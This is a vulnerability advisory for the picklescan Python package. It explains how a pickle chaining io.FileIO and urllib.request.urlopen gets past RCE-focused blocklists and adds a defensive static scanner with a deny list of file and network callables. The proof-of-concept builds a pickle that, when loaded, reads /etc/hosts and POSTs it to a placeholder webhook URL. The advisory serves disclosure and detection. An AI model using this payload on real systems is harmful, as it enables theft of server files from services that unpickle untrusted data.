PT-2026-3411 · Pypi · Picklescan
Published: 2026-01-08 · Updated: 2026-01-08
CVSS v4.0: 8.8 (High)
Vector: AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P
Summary
Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.
Details
The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:
- io.FileIO: Opens local files without using builtins.open.
- urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.
- Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.
PoC
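```python
import pickle, io, urllib.request

class GetFile:
    def __reduce__(self):
        # On load: io.FileIO('/etc/hosts', 'r') opens the file without builtins.open
        return (io.FileIO, ('/etc/hosts', 'r'))

class Exfiltrate:
    def __reduce__(self):
        # On load: urlopen(url, data=<file object>) sends the file as the POST body
        return (urllib.request.urlopen, ('https://webhook.site/YOUR UUID HERE', GetFile()))

with open("bypass http.pkl", "wb") as f:
    pickle.dump(Exfiltrate(), f)
```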
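A static check for the gap described above, as an added example that is not part of the advisory or of picklescan's code: it lists the globals a pickle would import, using pickletools without unpickling, and flags file and network callables. The FILE_NET_GLOBALS policy, the function names and the sample inputs are assumptions made for this example, and the STACK_GLOBAL resolution is a heuristic.

```python
import io
import pickle
import pickletools
import urllib.request

# Assumed policy for this example (not picklescan's own list): callables that
# read files or open connections. io.FileIO pickles under its real module, _io.
FILE_NET_GLOBALS = {("io", "FileIO"), ("_io", "FileIO"),
                    ("urllib.request", "urlopen")}

def referenced_globals(data):
    """List (module, name) imports in a pickle stream without unpickling it."""
    found, strings, memo, last = [], [], {}, None
    for op, arg, _pos in pickletools.genops(data):
        name = op.name
        if name in ("MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT"):
            # Remember what the memo slot holds (None when it is not a string).
            memo[len(memo) if name == "MEMOIZE" else arg] = last
            continue
        if name in ("GLOBAL", "INST"):
            found.append(tuple(arg.split(" ", 1)))
        elif name == "STACK_GLOBAL":
            # Protocol 4+: module and name are the two strings pushed before it.
            found.append(tuple(strings[-2:]) if len(strings) >= 2 else ("?", "?"))
        elif name.endswith("GET"):
            arg = memo.get(arg)  # resolve a memoized string reference
        pushes_str = "UNICODE" in name or "STRING" in name or name.endswith("GET")
        last = arg if pushes_str and isinstance(arg, str) else None
        if last is not None:
            strings.append(last)
    return found

def file_or_network_refs(data):
    """Flagged globals: known file/network callables plus unresolved imports."""
    return sorted(g for g in set(referenced_globals(data))
                  if g in FILE_NET_GLOBALS or "?" in g)

class _Ref:
    """Constructed sample object; it is only dumped here, never loaded."""
    def __init__(self, fn, *args):
        self.fn, self.args = fn, args
    def __reduce__(self):
        return (self.fn, self.args)

# Constructed input with the same shape as the PoC; the URL is a placeholder.
SAMPLE = pickle.dumps(_Ref(urllib.request.urlopen, "https://example.invalid/",
                           _Ref(io.FileIO, "/etc/hosts", "r")), protocol=4)
BENIGN = pickle.dumps({"weights": [1.0, 2.5], "epoch": 3}, protocol=4)

if __name__ == "__main__":
    print(file_or_network_refs(SAMPLE), file_or_network_refs(BENIGN))
```

The sample resolves to `_io.FileIO`, not `io.FileIO`, so a blocklist keyed only on the public module name would miss it.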
Impact
- Arbitrary file read
Thanks for this library and your time. If you think picklescan is focused on detecting only RCE-type vulnerabilities, and that adding File IO, HTTP or any protocol-based detection may cause a lot of noise, feel free to close this issue.
Fix
SSRF
Path traversal
Related Identifiers
Affected Products
Picklescan